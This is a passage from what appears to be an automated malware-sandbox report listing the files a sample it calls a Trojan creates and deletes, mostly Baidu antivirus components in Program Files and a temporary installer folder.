%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVWsc.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsUpdate.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepBase.dll (30968 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\901.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMDownload.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsClient.xml (18 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\BDKVVirusPlugins.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DesktopToast.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerXMLScript.dat (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDbSqlite.dll (19592 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ad.dll (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DllInject.dll (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\DriverManager.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\UserDetectionPlugin.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMTinyXml.dll (6360 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\PullUpConfig.xml (1524 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\fm.dat (597 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebMonBHO.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVE.dll (9320 bytes)
%System%\drivers\BDArKit.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\user_trusted_list.dat (125 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bddownloader.exe (41699 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVMainFrame.dll (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bduf.dll (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMScriptVM.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ccesign.dat (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDConfig.dll (36536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\smr.dat (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMUpdate.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\patch.7z (7433 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSRCore.dll (1425 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\804.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMEvents.dll (15 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\Database\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\7z.dll (12536 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMReport.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CompatibilityChecker.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Repair_PluginConfig.xml (411 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanS.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavEngine.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWrench.sys (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerLuaScript.dat (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdBugRpt.exe (23936 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonBHO.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdcomproxy.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0002.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDDriverFixer.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PullUpConfig.xml (1524 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe (15116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\809.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframePluginContainerConfig.xml (384 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebSafePlugin.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\FileMon.dll (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KavUpdate.dll (12536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\scan_mgr_config.dat (5 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMFrameWork.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\patch\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDShellExt.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMStringUtils.dll (1856 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanV.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMMsg.dll (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_customer.xml (75 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMNet.dll (5873 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\dl.dll (14988 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMReport.dll (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\licenses\duilib license.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdRepair.exe (16288 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCCommunicate.dll (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVMainFrame.dll (33633 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_product.xml (291 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\systemfile.dat (3 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDDriverFixer.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\user_trusted_list.dat (125 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\putips_wording.dat (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\InstallCfg.xml (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavFrame.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVConfig.rdb (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.sys (8752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\patch.7z (33536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ToastImage.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMNet.dll (58168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\cache_config.dat (938 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVTray_PluginConfig.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\bd0003.sys (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMAVE.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDPerflog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPerfMon.dll (7192 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepMgr.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\810.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand64.dll (4992 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMPerfMon.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\baidusdRepair.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdTray.exe (66750 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\cache_config.dat (469 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\811.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\app.ico (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVEng.dll (46488 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVCached.dll (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDCooly.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMReport.dll (23504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMFrameWork.dll (21480 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDConfig.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\blacksign.dat (1704 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHips.exe (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsBugRpt.exe (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\updlog.dll (13 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsUpdate.exe (37 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSkin.dll (33536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\DriverManager.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\smr.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\KVFixerConfigMgr.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVTray_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hipsClient.xml (784 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavCommon.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\app.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavCommon.dll (8184 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bddownloader.exe (9605 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavEngine.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\licenses\directui license.txt (593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCommunicate.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDriverFixer.dll (16368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafe.dll (33747 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\7z.dll (2105 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Repair_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPatchAgent.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavEngine.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWrench.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerLuaScript.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdBugRpt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\BDMSkin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_product.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHips.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonBHO.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdcomproxy.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\KVInstallHelper.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\placeholder_tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMMsg.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastImage.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRmvDevPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSd.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\res\InstallWnd.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\virus_type.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\809.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tips.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframePluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDArKit.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerConfig.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\7z.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KavUpdate.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdvs.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\scan_mgr_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanH.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_self_enc.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdmp.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanM.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\wverify.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\811.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\kav_verify.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vcrt.msi (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vcrt.msi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RtpContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDownLoadProtectPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVCached.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\InstallCfg.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\monitor_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDPerflog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMStringUtils.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_customer.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BSRLib.dat (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bdcomproxy.dll (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\dl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDLogicUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSkin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonHook.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframe_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMBase.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCallbackBind.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\baidusdRepair.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\systemfile.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vatl.msi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCScriptBind.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSDWrench.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\900.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdSvc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PrivacyProtect.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepMgr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSREng.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\iexplore.exe.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVMainFrame.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\directui license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\UserDetectionPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect_x64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\HIPSClient.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVTrayTipsPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWindowsLib.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\putips_wording.dat (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRecomm.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVVirusPlugins.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GameNoDisturb.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDConfig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RepairPluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavFrame.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\patch.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMNet.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PullUpConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\810.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafePlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsUpdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrayPluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepBase.dll (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\uninst.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUpdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVWsc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\GetSupplyId.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0001.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMLog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPerfMon.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVEng.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrustAndIso.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMUpdate.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanV.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastLogo.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\duilib license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDCooly.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\res (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vatl.msi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSRCore.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DesktopToast.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVFixerConfigMgr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\804.dat (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bddownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdTray.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMTinyXml.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDbSqlite.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0002.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerXMLScript.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CoolyContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\fm.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DriverManager.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\white_list.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ad.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DllInject.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsIU.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMReport.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdRepair.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDUDiskGuard.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMFrameWork.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUProxy64.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanS.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tuopan.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVRtp_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\blacksign.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVE.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Cooly_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\user_trusted_list.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CompatibilityChecker.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsBugRpt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\updlog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bddownloader.exe (0 bytes)
